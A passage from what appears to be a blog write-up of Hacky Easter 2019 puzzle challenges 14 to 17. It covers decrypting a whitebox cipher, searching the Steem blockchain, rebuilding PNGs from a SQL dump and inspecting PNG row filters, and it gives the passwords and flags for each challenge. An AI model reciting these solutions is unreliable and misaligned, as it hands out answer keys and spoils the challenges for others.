r&#x5B;0]+r&#x5B;4]+r&#x5B;8]+r&#x5B;0xc]+r&#x5B;1]+r&#x5B;5]+r&#x5B;9]+r&#x5B;0xd]+r&#x5B;2]+r&#x5B;6]+r&#x5B;0xa]+r&#x5B;0xe]+r&#x5B;3]+r&#x5B;7]+r&#x5B;0xb]+r&#x5B;0xf]\n\ndef decrypt(r):\n  r1 = decrShuffleNewOrig(r)\n  r2 = decrChooseFromDAT(r1)\n  
r3 = decrShuffleBlocks(r2)\n  r4 = r3\n  for x in range(8, -1, -1):\n    r4 = decrStack(x,r4)\n    r4 = decrShuffleBlocks(r4)\n  r5 = decrIdxShuffle(r4)\n  return r5\n\nif (len(sys.argv) &lt; 2):\n  print(&#039;usage:&#039;)\n  print(sys.argv&#x5B;0] + &#039; &lt;16 byte cipher text&gt;&#039;)\n  quit()\n\nplaintext = decrypt(sys.argv&#x5B;1].decode(&#039;hex&#039;))\nprint(plaintext)\n<\/pre><\/div>\n<br\/>Running the script on each of the four 16-byte blocks of the provided cipher text reveals the full plain text (the nested search over the four table indices takes a few minutes per run):\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg14# .\/reversedWhitebox.py 9771a6a9aea773a93edc1b9e82b74503\nCongrats! Enter \n<\/pre><\/div><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg14# .\/reversedWhitebox.py 0b770f8f992d0e45d7404f1d6533f9df\nwhiteboxblackhat\n<\/pre><\/div><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg14# .\/reversedWhitebox.py 348dbccd71034aff88afd188007df4a5\n into the Egg-o-\n<\/pre><\/div> <div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg14# .\/reversedWhitebox.py c844969584b5ffd6ed2eb92aa419914e\nMatic!\n<\/pre><\/div>\n<br\/>Accordingly the full plain text is <code>Congrats! 
Enter whiteboxblackhat into the Egg-o-Matic!<\/code>.\n<br\/>\n<br\/>Entering the password <code>whiteboxblackhat<\/code> in the Eggo-o-Matic&trade; yields the egg:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg14_03.png\" width=\"200\"\/>\n<br\/>\n<br\/>The flag is <span class=\"spanFlag\">he19-fPHI-HUKJ-u15q-Lvwz<\/span>.\n<br\/>\n<h1 id=\"chlg15\">15 &#8211; Seen in Steem<\/h1>\nThe challenge description states that a secret note about Hacky Easter 2019 has been placed in the <i>Steem<\/i> blockchain.\n<br\/>\n<br\/>We also get the information that the note was added during Easter 2018.\n<br\/>\n<br\/>This task could be solved simply by using Google. Since the author of the challenge is <code>darkstar<\/code>, I started googling for <code>darkstar<\/code> and <code>steem<\/code> and found the following profile on <a href=\"https:\/\/steemit.com\/@darkstar-42\" target=\"_new\" rel=\"noopener noreferrer\">steemit.com<\/a>:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg15_03.png\" width=\"800\"\/>\n<br\/>\n<br\/>However, I could not find any useful information on this website, so I kept googling and found a list of entries on <a href=\"https:\/\/steemd.com\/@darkstar-42?page=5\" target=\"_new\" rel=\"noopener noreferrer\">steemd.com<\/a> related to <code>darkstar-42<\/code>. 
Since we know that the note was added during Easter 2018, which was the 1st of April, we only need to find the entries of the appropriate date:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg15_02.png\" width=\"800\"\/>\n<br\/>\n<br\/>Entering <code>nomoneynobunny<\/code> as the password in the Eggo-o-Matic&trade; yields the egg:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg15_01.png\" width=\"200\"\/>\n<br\/>\n<br\/>The flag is <span class=\"spanFlag\">he19-TlUu-qs4k-uEbS-xRob<\/span>.\n<br\/>\n<h1 id=\"chlg16\">16 &#8211; Every-Thing<\/h1>\nThe challenge provides a zip archive called <code>EveryThing.zip<\/code>:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg16# file EveryThing.zip\nEveryThing.zip: Zip archive data, at least v2.0 to extract\n<\/pre><\/div>\n<br\/>This archive contains a file called <code>EveryThing.sql<\/code>:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg16# unzip EveryThing.zip\nArchive:  EveryThing.zip\n  inflating: EveryThing.sql\n<\/pre><\/div>\n<br\/>In order to inspect the SQL dump, we can load it into a new database created locally (<code>SOURCE<\/code> executes the statements of the dump one by one):\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg16# service mysql start\nroot@kali:~\/Documents\/he19\/egg16# mysql\nWelcome to the MariaDB monitor.  Commands end with ; or \\g.\nYour MariaDB connection id is 38\nServer version: 10.3.12-MariaDB-2 Debian buildd-unstable\n\nCopyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.\n\nType &#039;help;&#039; or &#039;\\h&#039; for help. 
Type &#039;\\c&#039; to clear the current input statement.\n\nMariaDB &#x5B;(none)]&gt; CREATE DATABASE EveryThing;\nQuery OK, 1 row affected (0.000 sec)\n\nMariaDB &#x5B;(none)]&gt; USE EveryThing;\nDatabase changed\nMariaDB &#x5B;EveryThing]&gt; SOURCE EveryThing.sql;\nQuery OK, 0 rows affected (0.000 sec)\n\nQuery OK, 0 rows affected (0.000 sec)\n\nQuery OK, 0 rows affected (0.000 sec)\n\nQuery OK, 0 rows affected (0.000 sec)\n\nQuery OK, 0 rows affected (0.000 sec)\n\nQuery OK, 0 rows affected (0.000 sec)\n\nQuery OK, 0 rows affected (0.000 sec)\n\nQuery OK, 0 rows affected (0.000 sec)\n\nQuery OK, 0 rows affected (0.000 sec)\n\nQuery OK, 0 rows affected (0.000 sec)\n\nQuery OK, 0 rows affected (0.000 sec)\n\nQuery OK, 0 rows affected (0.000 sec)\n\nQuery OK, 0 rows affected (0.000 sec)\n\nQuery OK, 0 rows affected (0.008 sec)\n\nQuery OK, 0 rows affected (0.000 sec)\n\nQuery OK, 0 rows affected (0.000 sec)\n\nQuery OK, 0 rows affected (0.000 sec)\n\nQuery OK, 8504 rows affected (0.165 sec)\nRecords: 8504  Duplicates: 0  Warnings: 0\n\nQuery OK, 8639 rows affected (0.144 sec)\nRecords: 8639  Duplicates: 0  Warnings: 0\n\nQuery OK, 8608 rows affected (0.123 sec)\nRecords: 8608  Duplicates: 0  Warnings: 0\n...\n<\/pre><\/div>\n<br\/>The file contains only one table called <code>Thing<\/code>:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nMariaDB &#x5B;EveryThing]&gt; SHOW TABLES;\n+----------------------+\n| Tables_in_EveryThing |\n+----------------------+\n| Thing                |\n+----------------------+\n1 row in set (0.000 sec)\n\n<\/pre><\/div>\n<br\/>This table has five columns called <code>id<\/code>, <code>ord<\/code>, <code>type<\/code>, <code>value<\/code> and <code>pid<\/code>.\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nMariaDB &#x5B;EveryThing]&gt; DESCRIBE 
Thing;\n+-------+---------------+------+-----+---------+-------+\n| Field | Type          | Null | Key | Default | Extra |\n+-------+---------------+------+-----+---------+-------+\n| id    | binary(16)    | NO   | PRI | NULL    |       |\n| ord   | int(11)       | NO   |     | NULL    |       |\n| type  | varchar(255)  | NO   |     | NULL    |       |\n| value | varchar(1024) | YES  |     | NULL    |       |\n| pid   | binary(16)    | YES  | MUL | NULL    |       |\n+-------+---------------+------+-----+---------+-------+\n5 rows in set (0.001 sec)\n\n<\/pre><\/div>\n<br\/>There are 38 different types:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nMariaDB &#x5B;EveryThing]&gt; SELECT type FROM Thing GROUP BY type;\n+-----------------------+\n| type                  |\n+-----------------------+\n| address               |\n| address.about         |\n| address.address       |\n| address.age           |\n| address.company       |\n| address.email         |\n| address.eyeColor      |\n| address.favoriteFruit |\n| address.gender        |\n| address.greeting      |\n| address.guid          |\n| address.name          |\n| address.phone         |\n| address.picture       |\n| address.registered    |\n| addressbook           |\n| book                  |\n| book.author           |\n| book.isbn             |\n| book.language         |\n| book.title            |\n| book.url              |\n| book.year             |\n| bookshelf             |\n| galery                |\n| png                   |\n| png.bkgd              |\n| png.chrm              |\n| png.gama              |\n| png.head              |\n| png.idat              |\n| png.iend              |\n| png.ihdr              |\n| png.phys              |\n| png.text              |\n| png.time              |\n| ROOT                  |\n| shelf                 |\n+-----------------------+\n38 rows in set (0.215 sec)\n<\/pre><\/div>\n<br\/>The 
<code>value<\/code> fields of the different types do not seem to contain any useful information:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nMariaDB &#x5B;EveryThing]&gt; SELECT value FROM Thing WHERE type=&#039;address.name&#039; LIMIT 10;\n+--------------------+\n| value              |\n+--------------------+\n| Madge Wood         |\n| Guadalupe Eaton    |\n| England Carson     |\n| Carmen Larsen      |\n| Potts Castro       |\n| Esther Greer       |\n| Hall Newton        |\n| Wilkerson Callahan |\n| Crosby Manning     |\n| Sallie Wilson      |\n+--------------------+\n10 rows in set (0.000 sec)\n\n...\n<\/pre><\/div>\n<br\/>The most promising type seems to be <code>png<\/code>. There are 11 entries with this type:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nMariaDB &#x5B;EveryThing]&gt; SELECT value FROM Thing WHERE type=&#039;png&#039;;\n+---------------------------------+\n| value                           |\n+---------------------------------+\n| Very old steam boat             |\n| Fantastic trail, but a dead end |\n| The best dinner ever            |\n| Local market                    |\n| At the beach                    |\n| Me, walking through the wood    |\n| The mountains                   |\n| A strange car                   |\n| Nice sunset                     |\n| My first time on a SUP          |\n| My second time on a SUP         |\n+---------------------------------+\n11 rows in set (0.101 sec)\n<\/pre><\/div>\n<br\/>A <code>png<\/code> entry itself seems to be only the container for an image. 
The actual data is stored in the corresponding chunk types like <code>png.bkgd<\/code>, <code>png.chrm<\/code>, &#8230;\n<br\/>\n<br\/>In order to determine which chunk types belong to a png, the field <code>pid<\/code> is used, which references the <code>id<\/code> of the parent element. In this case the <code>pid<\/code> of a chunk entry contains the <code>id<\/code> of its png entry.\n<br\/>\n<br\/>The <code>id<\/code> is stored in binary and can be displayed using the function <code>HEX<\/code>:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nMariaDB &#x5B;EveryThing]&gt; SELECT HEX(id), value FROM Thing WHERE type=&#039;png&#039;;\n+----------------------------------+---------------------------------+\n| HEX(id)                          | value                           |\n+----------------------------------+---------------------------------+\n| 1BD4209D9C664967AA7944E2ED2FC96C | Very old steam boat             |\n| 35FD7ABC15274E38A513F990D153FC37 | Fantastic trail, but a dead end |\n| 42097903161D41839D5D189B93E580D7 | The best dinner ever            |\n| 4651124A8B2F4CDFB7B3CBCA94BB7AF2 | Local market                    |\n| 55431A5914314EEF97CF9C31E07A95F4 | At the beach                    |\n| 58A8E910ED9C4FB3B8083FDFBCE99628 | Me, walking through the wood    |\n| 5BFE2BB8621B46119C7A281960904174 | The mountains                   |\n| 80DCB19D74354660AFDADD761B3DF72E | A strange car                   |\n| D39D3AD6FA85453196E46CD30FCD5612 | Nice sunset                     |\n| F91FD59C966641B2BB05F2374C6C8199 | My first time on a SUP          |\n| FC7ED04E5E464D3DBF210ED60561AE60 | My second time on a SUP         |\n+----------------------------------+---------------------------------+\n11 rows in set (0.000 sec)\n<\/pre><\/div>\n<br\/>In order to display all child chunks for the image called <code>Very old steam boat<\/code>, we can use the <code>id<\/code> 
(<code>1BD4209D9C664967AA7944E2ED2FC96C<\/code>):\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nMariaDB &#x5B;EveryThing]&gt; SELECT HEX(id), ord, type, value FROM Thing WHERE HEX(pid)=&#039;1BD4209D9C664967AA7944E2ED2FC96C&#039; ORDER BY ord;\n+----------------------------------+-----+----------+--------------------------------------+\n| HEX(id)                          | ord | type     | value                                |\n+----------------------------------+-----+----------+--------------------------------------+\n| 0E30644AB47D4E51BA2C47CBD5F02691 |   0 | png.head | iVBORw0KGgo=                         |\n| BABEFABC2E4F406ABC991762A077FED7 |   1 | png.ihdr | AAAADUlIRFIAAAHgAAAB4AgGAAAAfdS+lQ== |\n| A4F0850D832B417C906D6F595C3765E8 |   2 | png.bkgd | AAAABmJLR0QA\/wD\/AP+gvaeT             |\n| 0069956AF2EE42DEBE60E93670CFC5CB |   3 | png.phys | AAAACXBIWXMAADRjAAA0YwFVm585         |\n| 4C4D6C0D26924DAD91FE89D3A1070541 |   4 | png.time | AAAAB3RJTUUH4wEaDycfAlGlag==         |\n| AD9A9A93161E4CDA9DFF9C1255D0C0B9 |   5 | png.idat | 11                                   |\n| 4475CA57E03F4BAA9BA447A3B6D545D7 |   6 | png.idat | 11                                   |\n| 7155A2502B6243CB8D14BB67D13649A8 |   7 | png.idat | 11                                   |\n| C8D0E9EC265245B6B0317614B67510C3 |   8 | png.idat | 11                                   |\n| 3A0F84381D4745C99C9CCEEEF329E23B |   9 | png.idat | 11                                   |\n| 32591487AB014FE29D1147A14678F34C |  10 | png.idat | 11                                   |\n| A467DFCACB8F45ADA64892470ABB9BED |  11 | png.idat | 3                                    |\n| D64DE520DFB443098866142539048516 |  12 | png.iend | AAAAAElFTkSuQmCC                     |\n+----------------------------------+-----+----------+--------------------------------------+\n13 rows in set (0.114 sec)\n<\/pre><\/div>\n<br\/>In the above query 
we already sorted the result by <code>ord<\/code>, which defines the order of the individual child chunks.\n<br\/>\n<br\/>Most of the chunks actually contain base64 encoded data, but the <code>png.idat<\/code> chunks only contain a number. This suggests that these chunks are nested as well. We can find the corresponding child elements by using the <code>id<\/code> of the respective <code>png.idat<\/code> chunk as <code>pid<\/code> again:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nMariaDB &#x5B;EveryThing]&gt; SELECT HEX(id), ord, type, value FROM Thing WHERE HEX(pid)=&#039;AD9A9A93161E4CDA9DFF9C1255D0C0B9&#039; ORDER BY ord;\n+----------------------------------+-----+----------+---------------------------------------... +\n| HEX(id)                          | ord | type     | value                                    |\n+----------------------------------+-----+----------+---------------------------------------... 
+\n| 35A333B3EA0242D7A316CF2387F5A1B2 |   0 | png.idat | AAAgAElEQVR42uydeXykRZ3\/3\/V0d7pzTjKZzE... |\n| CA2FF632076D4FAD9FE020031CEFE701 |   1 | png.idat | iW9B\/rSno\/vlujdqaALW0DgFsLE3\/GkhxD8CgX... |\n| 3F2B4364061E473581D054824AD18653 |   2 | png.idat | jq5VenRoaALW0CiP6n25Bd8AZpVaVkvTHL7R+t... |\n| 3DE98E5C77BE4F2FA437CD6C9047E96E |   3 | png.idat | V5+zy7z3CeWyU9\/JN5e8kyXzFpXSBVd39kWe1i... |\n\n<\/pre><\/div>\n<br\/>These nested <code>png.idat<\/code> entries contain the actual data.\n<br\/>\n<br\/>In order to reconstruct the images, we first create a MySQL function which retrieves the binary data of a chunk: it base64 decodes the <code>value<\/code> field, or, for a <code>png.idat<\/code> chunk, concatenates the decoded values of all its child elements:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nMariaDB &#x5B;EveryThing]&gt; DELIMITER $$\nMariaDB &#x5B;EveryThing]&gt; CREATE FUNCTION GetData(hexid varchar(255)) RETURNS BLOB\n    -&gt;   BEGIN\n    -&gt;   DECLARE t varchar(255);\n    -&gt;   DECLARE b BLOB;\n    -&gt;   SELECT type into t FROM Thing WHERE HEX(id) = hexid;\n    -&gt;   IF t = &#039;png.idat&#039; THEN\n    -&gt;     SELECT GROUP_CONCAT(FROM_BASE64(value) ORDER BY ord SEPARATOR &#039;&#039;) INTO b FROM Thing WHERE HEX(pid)=hexid;\n    -&gt;   ELSE SELECT FROM_BASE64(value) INTO b FROM Thing WHERE HEX(id) = hexid;\n    -&gt;   END IF;\n    -&gt;   RETURN b;\n    -&gt;   END$$\nQuery OK, 0 rows affected (0.001 sec)\n\nMariaDB &#x5B;EveryThing]&gt; DELIMITER ;\n<\/pre><\/div>\n<br\/>Notice that for a <code>png.idat<\/code> chunk we need to retrieve the data from all child chunks, whereas for every other chunk we can simply base64 decode the <code>value<\/code> field.\n<br\/>\n<br\/>Now we can use this function in order to dump all png images:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nMariaDB 
&#x5B;EveryThing]&gt; SELECT GROUP_CONCAT(GetData(HEX(id)) ORDER BY ord SEPARATOR &#039;&#039;) FROM Thing WHERE HEX(pid)=&#039;1BD4209D9C664967AA7944E2ED2FC96C&#039; INTO DUMPFILE &#039;\/tmp\/1.png&#039;;\nQuery OK, 1 row affected (2.042 sec)\n\nMariaDB &#x5B;EveryThing]&gt; SELECT GROUP_CONCAT(GetData(HEX(id)) ORDER BY ord SEPARATOR &#039;&#039;) FROM Thing WHERE HEX(pid)=&#039;35FD7ABC15274E38A513F990D153FC37&#039; INTO DUMPFILE &#039;\/tmp\/2.png&#039;;\nQuery OK, 1 row affected (1.788 sec)\n\nMariaDB &#x5B;EveryThing]&gt; SELECT GROUP_CONCAT(GetData(HEX(id)) ORDER BY ord SEPARATOR &#039;&#039;) FROM Thing WHERE HEX(pid)=&#039;42097903161D41839D5D189B93E580D7&#039; INTO DUMPFILE &#039;\/tmp\/3.png&#039;;\nQuery OK, 1 row affected (1.811 sec)\n\n...\n<\/pre><\/div>\n<br\/>After a few false eggs &#8230;\n<br\/>\n<br\/><table><tr><td><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg16_01.png\" width=\"200\"\/><\/td><td><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg16_02.png\" width=\"200\"\/><\/td><td><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg16_03.png\" width=\"200\"\/><\/td><td style=\"font-size:36px;\">&#8230;<\/td><\/tr><\/table>\n<br\/>\n<br\/>&#8230; we find the actual egg:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg16_04.png\" width=\"200\"\/>\n<br\/>\n<br\/>The flag is <span class=\"spanFlag\">he19-qKaG-VHmv-Mm26-0mwy<\/span>.\n<br\/>\n<h1 id=\"chlg17\">17 &#8211; New Egg Design<\/h1>\nThe provided image displays an egg with a circuit diagram of an electronic <a href=\"https:\/\/en.wikipedia.org\/wiki\/High-pass_filter\" target=\"_new\" rel=\"noopener noreferrer\">high-pass filter<\/a>:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg17_01.png\" width=\"300\"\/>\n<br\/>\n<br\/>Also, 
the challenge description states that this challenge is about <i>filters<\/i>. As if these were not enough filters, the challenge image displays a QR code which was made illegible by applying a <i>mosaic filter<\/i>:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg17_02.jpg\" width=\"600\"\/>\n<br\/>\n<br\/>After the challenge was not solved by anyone on the 18th of April, a hint was added:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg17_03.png\" width=\"500\"\/>\n<br\/>\n<br\/>My vague assumption was that the challenge probably had something to do with <i>filters<\/i>. Though, I was really in the dark on this. I mainly focused on trying to find information hidden within the RGBA values, without any success.\n<br\/>\n<br\/>When analyzing the png structure of the image, I compared the output of <code>pngcheck<\/code> on the image &#8230;\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg17# pngcheck -v eggdesign.png\nFile: eggdesign.png (62643 bytes)\n  chunk IHDR at offset 0x0000c, length 13\n    480 x 480 image, 32-bit RGB+alpha, non-interlaced\n  chunk gAMA at offset 0x00025, length 4: 0.45455\n  chunk cHRM at offset 0x00035, length 32\n    White x = 0.3127 y = 0.329,  Red x = 0.64 y = 0.33\n    Green x = 0.3 y = 0.6,  Blue x = 0.15 y = 0.06\n  chunk pHYs at offset 0x00061, length 9: 13410x13410 pixels\/meter (341 dpi)\n  chunk tIME at offset 0x00076, length 7:  6 Jan 2019 09:27:56 UTC\n  chunk tEXt at offset 0x00089, length 24, keyword: Software\n  chunk IDAT at offset 0x000ad, length 8192\n    zlib: deflated, 32K window, default compression\n  chunk IDAT at offset 0x020b9, length 8192\n  chunk IDAT at offset 0x040c5, length 8192\n  chunk IDAT at offset 0x060d1, length 8192\n  chunk IDAT at offset 0x080dd, length 
8192\n  chunk IDAT at offset 0x0a0e9, length 8192\n  chunk IDAT at offset 0x0c0f5, length 8192\n  chunk IDAT at offset 0x0e101, length 5022\n  chunk IEND at offset 0x0f4ab, length 0\nNo errors detected in eggdesign.png (15 chunks, 93.2% compression).\n\n<\/pre><\/div>\n<br\/>&#8230; with another egg (in this case from challenge 11):\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg17# pngcheck -v ..\/egg11\/2b8c672e9759bd56ab1702dcee0e109182374b8c.png\nFile: ..\/egg11\/2b8c672e9759bd56ab1702dcee0e109182374b8c.png (66058 bytes)\n  chunk IHDR at offset 0x0000c, length 13\n    480 x 480 image, 32-bit RGB+alpha, non-interlaced\n  chunk gAMA at offset 0x00025, length 4: 0.45455\n  chunk cHRM at offset 0x00035, length 32\n    White x = 0.3127 y = 0.329,  Red x = 0.64 y = 0.33\n    Green x = 0.3 y = 0.6,  Blue x = 0.15 y = 0.06\n  chunk bKGD at offset 0x00061, length 6\n    red = 0x00ff, green = 0x00ff, blue = 0x00ff\n  chunk pHYs at offset 0x00073, length 9: 13411x13411 pixels\/meter (341 dpi)\n  chunk tIME at offset 0x00088, length 7: 12 Jan 2019 05:50:49 UTC\n  chunk IDAT at offset 0x0009b, length 32768\n    zlib: deflated, 32K window, maximum compression\n  chunk IDAT at offset 0x080a7, length 32768\n  chunk IDAT at offset 0x100b3, length 189\n  chunk tEXt at offset 0x1017c, length 37, keyword: date:create\n  chunk tEXt at offset 0x101ad, length 37, keyword: date:modify\n  chunk tEXt at offset 0x101de, length 24, keyword: Software\n  chunk IEND at offset 0x10202, length 0\nNo errors detected in ..\/egg11\/2b8c672e9759bd56ab1702dcee0e109182374b8c.png (13 chunks, 92.8% compression).\n<\/pre><\/div>\n<br\/>I noticed that the structure differs and the image of this challenge especially has more <code>IDAT<\/code> chunks. 
Though, I could not make any use of this information until I got a hint that the version of <code>pngcheck<\/code> from the default repository lacks some information in the output. Thus I downloaded <code>pngcheck<\/code> from <a href=\"https:\/\/directory.fsf.org\/wiki\/Pngcheck\" target=\"_new\" rel=\"noopener noreferrer\">here<\/a>. In order to compile it, we have to add the path to the zlib library <code>libz.a<\/code> in the makefile:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\n\nroot@kali:~\/Downloads\/pngcheck-2.3.0# locate libz.a\n\/usr\/lib\/x86_64-linux-gnu\/libz.a\nroot@kali:~\/Downloads\/pngcheck-2.3.0# cat Makefile.unx\n...\n\n# macros --------------------------------------------------------------------\n\nZPATH = \/usr\/lib\/x86_64-linux-gnu\/ # ADJUSTED THIS LINE\nZINC = -I$(ZPATH)\n...\n<\/pre><\/div>\n<br\/>Now we can compile the program:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Downloads\/pngcheck-2.3.0# make -f Makefile.unx\ngcc -O -Wall -I\/usr\/lib\/x86_64-linux-gnu\/ -DUSE_ZLIB -o pngcheck pngcheck.c \/usr\/lib\/x86_64-linux-gnu\/\/libz.a\n...\n\n<\/pre><\/div>\n<br\/>This version offers not only verbose output (<code>-v<\/code>), but also very verbose output (<code>-vv<\/code>):\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; highlight: [21]; title: ; notranslate\" title=\"\">\nroot@kali:~\/Downloads\/pngcheck-2.3.0# .\/pngcheck\nPNGcheck, version 2.3.0 of 7 July 2007,\n   by Alexander Lehmann, Andreas Dilger and Greg Roelofs.\n   Compiled with zlib 1.2.11; using zlib 1.2.11.\n\nTest PNG, JNG or MNG image files for corruption, and print size\/type info.\n\nUsage:  pngcheck &#x5B;-7cfpqtv] file.{png|jng|mng} &#x5B;file2.{png|jng|mng} &#x5B;...]]\n   or:  ... 
| pngcheck &#x5B;-7cfpqstvx]\n   or:  pngcheck &#x5B;-7cfpqstvx] file-containing-PNGs...\n\nOptions:\n   -7  print contents of tEXt chunks, escape chars &gt;=128 (for 7-bit terminals)\n   -c  colorize output (for ANSI terminals)\n   -f  force continuation even after major errors\n   -p  print contents of PLTE, tRNS, hIST, sPLT and PPLT (can be used with -q)\n   -q  test quietly (output only errors)\n   -s  search for PNGs within another file\n   -t  print contents of tEXt chunks (can be used with -q)\n   -v  test verbosely (print most chunk data)\n   -vv test very verbosely (decode &amp; print line filters)\n   -w  suppress windowBits test (more-stringent compression check)\n   -x  search for PNGs within another file and extract them when found\n\nNote:  MNG support is more informational than conformance-oriented.\n<\/pre><\/div>\n<br\/>Applying this on the provided image removed the scales from my eyes:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Downloads\/pngcheck-2.3.0# .\/pngcheck -vv ~\/Documents\/he19\/egg17\/eggdesign.png\nFile: \/root\/Documents\/he19\/egg17\/eggdesign.png (62643 bytes)\n  chunk IHDR at offset 0x0000c, length 13\n    480 x 480 image, 32-bit RGB+alpha, non-interlaced\n  chunk gAMA at offset 0x00025, length 4: 0.45455\n  chunk cHRM at offset 0x00035, length 32\n    White x = 0.3127 y = 0.329,  Red x = 0.64 y = 0.33\n    Green x = 0.3 y = 0.6,  Blue x = 0.15 y = 0.06\n  chunk pHYs at offset 0x00061, length 9: 13410x13410 pixels\/meter (341 dpi)\n  chunk tIME at offset 0x00076, length 7:  6 Jan 2019 09:27:56 UTC\n  chunk tEXt at offset 0x00089, length 24, keyword: Software\n  chunk IDAT at offset 0x000ad, length 8192\n    zlib: deflated, 32K window, default compression\n    row filters (0 none, 1 sub, 2 up, 3 avg, 4 paeth):\n      0 1 0 0 0 0 1 1 0 1 1 0 1 1 1 1 0 1 1 0 1 1 1 0 0\n      1 1 0 0 1 1 1 0 1 1 1 0 0 1 0 0 1 1 0 0 0 0 1 0 1\n      1 
1 0 1 0 0 0 1 1 1 0 1 0 1 0 1 1 0 1 1 0 0 0 1 1\n      0 0 0 0 1 0 1 1 1 (84 out of 480)\n  chunk IDAT at offset 0x020b9, length 8192\n    row filters (0 none, 1 sub, 2 up, 3 avg, 4 paeth):\n      0 1 0 0 0 1 1 0 1 0 0 1 0 1 1 0 1 1 1 1 0 1 1 0 1\n      1 1 0 0 0 1 0 1 1 0 0 0 0 1 0 0 0 0 0 0 1 1 0 1 0\n      0 0 (136 out of 480)\n  chunk IDAT at offset 0x040c5, length 8192\n    row filters (0 none, 1 sub, 2 up, 3 avg, 4 paeth):\n      0 1 1 0 0 1 0 1 0 1 1 1 0 0 1 0 0 1 1 0 0 1 0 1 0\n      0 1 0 0 0 0 0 0 1 1 0 1 0 0 1 0 1 1 1 0 0 (182 out of 480)\n  chunk IDAT at offset 0x060d1, length 8192\n    row filters (0 none, 1 sub, 2 up, 3 avg, 4 paeth):\n      1 1 0 0 1 0 0 0 0 0 0 1 1 1 1 0 0 1 0 1 1 0 1 1 1\n      1 0 1 1 1 0 1 0 1 0 1 1 1 0 0 1 0 0 0 1 0 0 0 0 0\n      0 1 1 0 0 1 1 0 0 (241 out of 480)\n  chunk IDAT at offset 0x080dd, length 8192\n    row filters (0 none, 1 sub, 2 up, 3 avg, 4 paeth):\n      1 1 0 1 1 0 0 0 1 1 0 0 0 0 1 0 1 1 0 0 1 1 1 0 0\n      1 1 1 0 1 0 0 0 1 0 0 0 0 0 0 1 1 0 1 0 0 0 0 1 1\n      0 (292 out of 480)\n  chunk IDAT at offset 0x0a0e9, length 8192\n    row filters (0 none, 1 sub, 2 up, 3 avg, 4 